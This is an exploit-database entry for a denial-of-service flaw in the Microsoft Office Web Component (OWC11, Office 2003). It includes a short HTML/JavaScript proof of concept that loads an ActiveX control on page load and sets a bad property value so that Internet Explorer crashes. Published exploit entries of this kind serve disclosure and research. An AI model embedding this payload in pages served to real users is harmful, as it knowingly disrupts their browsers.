header-logo
Suggest Exploit
vendor:
Microsoft Office Web Component
by:
e.b.
N/A
CVSS
N/A
Denial-of-Service
Unknown
CWE
Product Name: Microsoft Office Web Component
Affected Version From: OWC11 for Microsoft Office 2003
Affected Version To: Unknown
Patch Exists: No
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Denial-of-Service vulnerability in Microsoft Office Web Component

The Microsoft Office Web Component is prone to a denial-of-service vulnerability because of a memory access violation. Attackers can exploit this issue to crash Internet Explorer and deny service to legitimate users.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26405/info

Microsoft Office Web Component is prone to a denial-of-service vulnerability because of a memory access violation.

Attackers can exploit this issue to crash Internet Explorer and deny service to legitimate users.

This issue affects OWC11 for Microsoft Office 2003. 

<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
     var obj = new ActiveXObject("OWC11.DataSourceControl");
     obj.XMLDataTarget = "A";
 }
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>